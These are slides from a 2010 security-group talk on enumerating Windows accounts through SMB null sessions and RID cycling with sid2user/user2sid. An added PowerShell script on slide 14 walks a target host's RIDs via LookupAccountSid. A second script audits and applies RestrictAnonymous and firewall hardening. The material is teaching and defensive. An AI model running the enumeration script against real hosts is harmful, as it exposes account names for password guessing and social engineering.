Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users.


1 Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users

2 Outline
Purpose
Quick Review
The Old (Win2k)
The New (XP and above)
What is a SID?
sid2user
user2sid
Attack Outline
How do we prevent this?
Demo
More Info

3 Purpose
Enumerate users
Password guessing
Social engineering
It's just useful...
If we can do it, so can the bad guys
We'll go over how to prevent this shortly... but first let's make sure it works ;)

4 Quick Review
We'll be using SMB null sessions
So first... a little background
SMB = Server Message Block
File sharing
Printing over a network
etc...
TCP port 445 (and TCP port 139 when SMB runs over NetBIOS)

5 ...Quick Review
You can create an SMB connection with a user account, but you can also create a null session:
User ""
Pass ""
Allowed by default (RestrictAnonymous, covered later, decides whether a null session may connect and what it may query)
C:\> net use \\host "pass" /u:"user"
C:\> net use \\192.168.69.2 "" /u:""
The command completed successfully.
Now we can direct queries at the remote host's API

6 The Old (Win2k)
By default, Win2k relies on SMB
SMB includes an API
Returns computer info through ports 139 and 445
With Win2k, you can just pull user accounts:
First, establish a null SMB session
Then, remotely access the API
Network info, shares, users, groups, registry keys...
Obviously... this is way too much info

7 ...The Old (Win2k)

8 The New (XP and above)
So they got a little smarter... and the default settings no longer permit this.
"The RestrictAnonymous registry value was introduced in Microsoft Windows NT 4.0 Service Pack 3 (SP3) and is now included with Windows 2000." - microsoft.com
But, let's take a closer look...

9 ...The New (XP and above)
RestrictAnonymous (a DWORD under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) has 3 values:
0 - anonymous connections can enumerate ...
1 - anonymous connections can not enumerate...
2 - no anonymous connections are possible
"Note Even with the RestrictAnonymous registry value set to 1, there are Win32 programming interfaces that do not restrict anonymous connections. Therefore, tools that use these interfaces can still enumerate information over a null session even when the RestrictAnonymous registry value is set to 1." - microsoft.com

10 What is a SID?
SID = Security Identifier
Users reference an account by name
The OS internally references a SID
users, groups, and more...
unique, never reused
Every account SID ends in a RID (Relative Identifier)
The RID identifies a particular account or group within its domain (or local machine)
Account SID = domain SID + RID
SID of the domain (or of the machine, for local accounts), concatenated with the account's RID

11 ...What is a SID?
S-1-5-32-544
This SID has four components:
revision level (1)
identifier authority (5)
domain identifier (32)
a relative identifier (544)
S-1-5-32 collectively identifies a domain (here the BUILTIN domain; a real domain or a local machine has the form S-1-5-21-x-y-z)
The last value, 544, is the Relative Identifier (RID); in BUILTIN that is the Administrators group
Well-known RIDs:
500 - Administrator
501 - Guest
1000 and up - user accounts and groups created after install (the well-known range stops at 999)

12 sid2user
Makes a different API call than the one blocked by RestrictAnonymous
Performs the Win32 function LookupAccountSid
Takes a SID, returns a user account
Surely, if they know the SID, they're trustworthy
sid2user.exe \\host [SID] [RID]
sid2user.exe \\anonymous ## ## ## 500
(the SID is given as space-separated subauthorities, without the "S-1-" prefix)

13 user2sid
But oh noes... we need the SID!
Takes an account name, returns the SID
Performs the Win32 function LookupAccountName
There are well-known account names... administrator, "domain users", guest, etc...
user2sid.exe \\host [account name]
user2sid.exe \\anonymous guest

14 Attack Outline
1. Establish a null session
2. Use user2sid to find the SID (resolve a well-known name such as guest, then drop its RID to get the domain or machine SID)
3. Use sid2user to iterate through known RIDs, appending each one to that SID
4. You now know all the accounts on the box...
First, let's see how to prevent this... then we'll do a quick demo :)
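The four steps above, as an added example that is not part of the slides and not Evgenii Rudnyi's sid2user/user2sid code. It uses the same two Win32 calls the slides name (LookupAccountName for step 2, LookupAccountSid for step 3) through P/Invoke from PowerShell, so it behaves like the tools: the lookups ride the anonymous LSA connection, and a hardened host answers every RID with ERROR_NONE_MAPPED. The target address 192.168.69.2 is the hypothetical host from slide 5; the RID range 500-1050 and the 68-byte SID buffer are assumptions.

```powershell
# Added example (not from the slides): RID cycling over a null session with the
# same Win32 calls as user2sid/sid2user. Assumes: TCP 445 reachable, and step 1
# (slide 5) already done from cmd.exe:   net use \\<target> "" /user:""
# 192.168.69.2 is the hypothetical host from the slides; the RID range is a guess.
param(
    [string]$Target   = '192.168.69.2',
    [int]   $FirstRid = 500,
    [int]   $LastRid  = 1050
)

Add-Type -Namespace Win32 -Name Advapi -MemberDefinition @'
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool LookupAccountName(string lpSystemName, string lpAccountName,
    byte[] Sid, ref uint cbSid, System.Text.StringBuilder ReferencedDomainName,
    ref uint cchReferencedDomainName, out int peUse);

[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool LookupAccountSid(string lpSystemName, byte[] Sid,
    System.Text.StringBuilder lpName, ref uint cchName,
    System.Text.StringBuilder ReferencedDomainName, ref uint cchReferencedDomainName,
    out int peUse);
'@

# Step 2 (user2sid): resolve a well-known name on the remote box to its SID.
function Get-RemoteSid([string]$System, [string]$Account) {
    $sid = New-Object byte[] 68;                   $cbSid  = [uint32]68   # max SID is 68 bytes
    $dom = New-Object System.Text.StringBuilder 256; $cchDom = [uint32]256
    $use = 0
    $ok = [Win32.Advapi]::LookupAccountName($System, $Account, $sid, [ref]$cbSid,
                                            $dom, [ref]$cchDom, [ref]$use)
    if (-not $ok) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "LookupAccountName($Account) on $System failed: Win32 error $err"
    }
    [System.Security.Principal.SecurityIdentifier]::new($sid, 0)
}

# Step 3 (sid2user): ask the remote LSA which account owns a SID. $null = no such RID
# (ERROR_NONE_MAPPED), which is also what a host with anonymous translation disabled returns.
function Resolve-RemoteSid([string]$System, [System.Security.Principal.SecurityIdentifier]$Sid) {
    $bytes = New-Object byte[] $Sid.BinaryLength
    $Sid.GetBinaryForm($bytes, 0)
    $name = New-Object System.Text.StringBuilder 256; $cchName = [uint32]256
    $dom  = New-Object System.Text.StringBuilder 256; $cchDom  = [uint32]256
    $use  = 0
    $ok = [Win32.Advapi]::LookupAccountSid($System, $bytes, $name, [ref]$cchName,
                                           $dom, [ref]$cchDom, [ref]$use)
    if (-not $ok) { return $null }
    # SID_NAME_USE values returned in peUse
    $types = @{ 1='User'; 2='Group'; 3='Domain'; 4='Alias'; 5='WellKnownGroup';
                6='DeletedAccount'; 7='Invalid'; 8='Unknown'; 9='Computer' }
    [pscustomobject]@{ Sid = $Sid.Value; Account = "$dom\$name"; Type = $types[$use] }
}

# Guest (RID 501) exists on every Windows box; its SID minus the RID is the machine/domain SID.
$guestSid  = Get-RemoteSid -System $Target -Account 'Guest'
$domainSid = $guestSid.AccountDomainSid
"Domain/machine SID of ${Target}: $($domainSid.Value)"

# Step 4: walk the RID range; every hit is an account or group on the box.
$FirstRid..$LastRid | ForEach-Object {
    $candidate = [System.Security.Principal.SecurityIdentifier]::new("$($domainSid.Value)-$_")
    Resolve-RemoteSid -System $Target -Sid $candidate
} | Where-Object { $_ } | Format-Table -AutoSize
```

Run it as .\enum.ps1 -Target 192.168.69.2 after the net use command from slide 5. The .NET SecurityIdentifier class is used only to split and rebuild the S-1-5-21-x-y-z-RID string; the resolution itself goes to the remote host, which is why the result changes once the host's anonymous SID/name translation is turned off.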

15 How do we prevent this?
Block ports at the firewall
SMB traffic (TCP 139/445) shouldn't cross the network perimeter
Block ports on the host
May affect compatibility with clients, servers, apps.
XP and above: secpol.msc → Local Policies → Security Options
Network access: Allow anonymous SID / Name translation → Disabled
Network access: Do not allow anonymous enumeration of SAM accounts → Enabled
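An added example (not from the slides) that audits the host-side settings above on the local machine and, with -Fix, applies them. The mapping it relies on: "Do not allow anonymous enumeration of SAM accounts" is stored as RestrictAnonymousSAM, its companion "...SAM accounts and shares" as RestrictAnonymous (both DWORDs under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, the key slide 9 refers to), while "Allow anonymous SID/Name translation" lives in the LSA policy database and is exposed by secedit as LSAAnonymousNameLookup. The temp file names and the firewall rule name are assumptions; run from an elevated PowerShell.

```powershell
# Added example (not from the slides): audit/apply the slide-15 hardening locally.
# Needs an elevated prompt. File names and the firewall rule name are arbitrary.
param([switch]$Fix)

$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

# Registry-backed secpol.msc entries (Network access: ...) and the value we want:
#   RestrictAnonymousSAM = 1  "Do not allow anonymous enumeration of SAM accounts"
#   RestrictAnonymous    = 1  "Do not allow anonymous enumeration of SAM accounts and shares"
$wanted = @{ RestrictAnonymousSAM = 1; RestrictAnonymous = 1 }

function Get-LsaSetting {
    $cur = Get-ItemProperty -Path $lsa
    foreach ($name in $wanted.Keys) {
        $value = $cur.$name          # $null when the value has never been set
        [pscustomobject]@{ Setting = $name; Current = $value; Wanted = $wanted[$name]
                           Ok = ($value -eq $wanted[$name]) }
    }
}

# "Allow anonymous SID/Name translation" is not a registry value; export the
# local security policy and read LSAAnonymousNameLookup (0 = Disabled, what we want).
function Get-AnonymousNameLookup {
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $cfg /areas SECURITYPOLICY | Out-Null
    $line = Select-String -Path $cfg -Pattern '^LSAAnonymousNameLookup\s*=\s*(\d)' |
            Select-Object -First 1
    Remove-Item $cfg -ErrorAction SilentlyContinue
    $value = if ($line) { [int]$line.Matches[0].Groups[1].Value } else { $null }
    [pscustomobject]@{ Setting = 'LSAAnonymousNameLookup'; Current = $value; Wanted = 0
                       Ok = ($value -eq 0) }
}

$report = @(Get-LsaSetting) + (Get-AnonymousNameLookup)
$report | Format-Table -AutoSize

if ($Fix) {
    foreach ($name in $wanted.Keys) {
        Set-ItemProperty -Path $lsa -Name $name -Value $wanted[$name] -Type DWord
    }

    # Minimal secedit template that disables anonymous SID/name translation.
    $inf = Join-Path $env:TEMP 'no-anon-lookup.inf'
    @'
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[System Access]
LSAAnonymousNameLookup = 0
'@ | Set-Content -Path $inf -Encoding Unicode
    $db = Join-Path $env:TEMP 'no-anon-lookup.sdb'
    secedit /configure /db $db /cfg $inf /areas SECURITYPOLICY | Out-Null
    Remove-Item $inf, $db -ErrorAction SilentlyContinue

    # "Block ports on the host": drop inbound SMB/NetBIOS session traffic. Add
    # remoteip=<LAN range> to the rule if clients on the LAN still need file sharing.
    netsh advfirewall firewall add rule name="Block inbound SMB (139,445)" dir=in `
        action=block protocol=TCP localport=139,445 | Out-Null
}
```

Re-running the enumeration from slide 14 against a host where the report shows Ok = True for all three rows is the check: LookupAccountSid then fails for every RID, which is exactly the gap between RestrictAnonymous = 1 and the "other Win32 interfaces" Microsoft's note on slide 9 warns about.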

16 DEMO

17 More Info
The author of the tools: http://evgenii.rudnyi.ru/soft/sid/
"How Security Identifiers Work": http://technet.microsoft.com/en-us/library/cc778824%28WS.10%29.aspx
Google sid2user, user2sid, Windows SID, etc...

